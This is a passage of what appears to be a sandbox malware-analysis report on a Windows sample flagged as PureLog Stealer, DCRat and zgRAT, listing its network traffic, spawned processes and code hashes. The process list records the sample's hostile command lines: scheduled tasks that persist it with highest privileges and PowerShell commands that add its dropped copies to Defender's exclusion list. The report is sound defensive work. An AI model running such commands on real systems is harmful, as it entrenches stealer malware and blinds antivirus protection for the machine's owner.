Nov 25, 2024 22:39:36.271037102 CET	1040	OUT	Data Raw: 5a 55 5f 59 5d 5c 50 51 59 59 54 56 57 58 55 5b 58 5d 5b 5b 59 5d 56 45 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZU_Y]\PQYYTVWXU[X][[Y]VEZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [00&=:4]$Z&C*!'8V8^+U(+;?2960_>2<(>&\%#P-,
Nov 25, 2024 22:39:37.182209015 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:37.415941000 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Target ID:	0
Start time:	16:36:55
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\4Awb1u1GcJ.exe"
Imagebase:	0xa40000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1664770511.0000000000A42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1887728874.0000000012FBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:37:06
Start date:	25/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline"
Imagebase:	0x7ff61e3e0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:37:06
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:37:06
Start date:	25/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1D7.tmp" "c:\Windows\System32\CSC3F9C54C7EA774D8CB8E83128B6DCF481.TMP"
Imagebase:	0x7ff6678c0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:37:06
Start date:	25/11/2024
Path:	C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe
Imagebase:	0xa80000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:37:07
Start date:	25/11/2024
Path:	C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe
Wow64 process (32bit):	true
Commandline:	C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe
Imagebase:	0x400000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	16:37:07
Start date:	25/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 13 /tr "'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:37:07
Start date:	25/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	16:37:07
Start date:	25/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "4Awb1u1GcJ4" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\4Awb1u1GcJ.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	16:37:07
Start date:	25/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "4Awb1u1GcJ" /sc ONLOGON /tr "'C:\Users\user\Desktop\4Awb1u1GcJ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	16:37:07
Start date:	25/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "4Awb1u1GcJ4" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\4Awb1u1GcJ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\hxpWOXgnBGVLArPcwqxpuA.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 4364, Parent PID: 5332

General

Target ID:	28
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\dllhost.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4Awb1u1GcJ.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	16:37:08
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	16:37:09
Start date:	25/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RM8EX6c6Td.bat"
Imagebase:	0x7ff711040000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	16:37:09
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	16:37:09
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
Imagebase:	0xad0000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	16:37:09
Start date:	25/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7a1c40000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	16:37:09
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
Imagebase:	0xf10000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	16:37:10
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\NetHood\dllhost.exe
Imagebase:	0x8f0000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	16:37:10
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\NetHood\dllhost.exe
Imagebase:	0xd50000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	16:37:10
Start date:	25/11/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7fca10000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	16:37:16
Start date:	25/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	16:37:20
Start date:	25/11/2024
Path:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe"
Imagebase:	0xd0000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	16:37:20
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\NetHood\dllhost.exe"
Imagebase:	0x430000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	16:37:25
Start date:	25/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	16:37:28
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\NetHood\dllhost.exe"
Imagebase:	0x7ff70f330000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	16:37:37
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\4Awb1u1GcJ.exe"
Imagebase:	0xbd0000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	16:37:46
Start date:	25/11/2024
Path:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe"
Imagebase:	0x3c0000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	16:37:54
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\NetHood\dllhost.exe"
Imagebase:	0x6f0000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	16:38:02
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\4Awb1u1GcJ.exe"
Imagebase:	0xfa0000
File size:	1'916'928 bytes
MD5 hash:	382EAEDC34BFC15B7E749FB8A0CFF600
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BEA195A Relevance: .5, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1909983908.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bea0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1292a5b059ef8e8a8ad303427c1a803301617f7b3c13a3b7db2d5a7b6959be1d
Instruction ID: 68682999566ffa05802e94647a0711240fb354c5f8f2c86b08cacfc01a647e95
Opcode Fuzzy Hash: 1292a5b059ef8e8a8ad303427c1a803301617f7b3c13a3b7db2d5a7b6959be1d
Instruction Fuzzy Hash: 1412AF70E1954E8FDB6DDB98C4A06B8BBB5FF55300F1081BED05ED7296CA39AA41CB01

Function 00007FFD9BAB0D77 Relevance: .3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0136b955a53d781022a32ef60e40479bfbbc6fed8565e5cba76286b5f25d98a
Instruction ID: 953813ec7919257e9c6c2a670167ddad52ac5f12d99095b4ec3f702a8ebaf4bf
Opcode Fuzzy Hash: b0136b955a53d781022a32ef60e40479bfbbc6fed8565e5cba76286b5f25d98a
Instruction Fuzzy Hash: 3091E272A18A9A4FE799DB68C8657A97FE1FF99314F0101BED059C73E6CEB41410CB40

Function 00007FFD9BEACACF Relevance: 1.7, APIs: 1, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FFD9BEACC61

Memory Dump Source

Source File: 00000000.00000002.1909983908.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bea0000_4Awb1u1GcJ.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 06a0a337de5bc101557e338cf01c9a3084784107ea463036b3f177177cb1f737
Instruction ID: 93db2baae33b5595c65cba9d5da02d1d675b6b968b4acfd6483dbfa3306efdde
Opcode Fuzzy Hash: 06a0a337de5bc101557e338cf01c9a3084784107ea463036b3f177177cb1f737
Instruction Fuzzy Hash: B2719F70A18A4C8FDB68DF28D8597F937E5FB58311F10423EE84EC7292CA75A945CB81

Function 00007FFD9BAB08D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 501a44c792662ccdcd24745fa8207230e3f5222593b39f918141ce4740b781ef
Instruction ID: efb3d4836ca1d65418de21a1ad78bdd7c98c75c07ab6c3d716a8575eece4ac3a
Opcode Fuzzy Hash: 501a44c792662ccdcd24745fa8207230e3f5222593b39f918141ce4740b781ef
Instruction Fuzzy Hash: 39412922B0C5690EE328F7ACA4A56FD7781DF9933AF0405BFE45DCB1D7CD1869418284

Function 00007FFD9BAB11A1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deda27b4e60751d9514dc889d354049b7048c42d518855c532ab14742f81caf3
Instruction ID: 4186d5cbaabad0a5494560d3280da988feda39fa4e7ad33a6053643530127e01
Opcode Fuzzy Hash: deda27b4e60751d9514dc889d354049b7048c42d518855c532ab14742f81caf3
Instruction Fuzzy Hash: 47319230A1E69E8FDB55EB68C8649A87BF0EF66300F0505BBC059C71E3DE68A941CB50

Function 00007FFD9BAB0998 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b52ef32d7ba040f5432e788f2158e9fcdddeaa357cd5f9f3259116efbb028e3
Instruction ID: 9d2e9d483d9852d9f5b7d9079224c81e4d272fdc00b42941849f3268cc018354
Opcode Fuzzy Hash: 8b52ef32d7ba040f5432e788f2158e9fcdddeaa357cd5f9f3259116efbb028e3
Instruction Fuzzy Hash: 39212520F1892D0FF7A8B76C946A67973C6EF98325F5101BEE40DC33E6DC64AD024681

Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed8558d63e38b93317e0e822899cea8fd6f919a0393d0b438f9283f2a38bcd45
Instruction ID: 15d2f5773009d3986ae48427a67c41884399f4de99bc3b4ef64dd7fa5e8d7109
Opcode Fuzzy Hash: ed8558d63e38b93317e0e822899cea8fd6f919a0393d0b438f9283f2a38bcd45
Instruction Fuzzy Hash: CE312831B0D25D8FE732ABA998652EC7B60EF52325F0581B7D0288B1D3DA782645CB85

Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

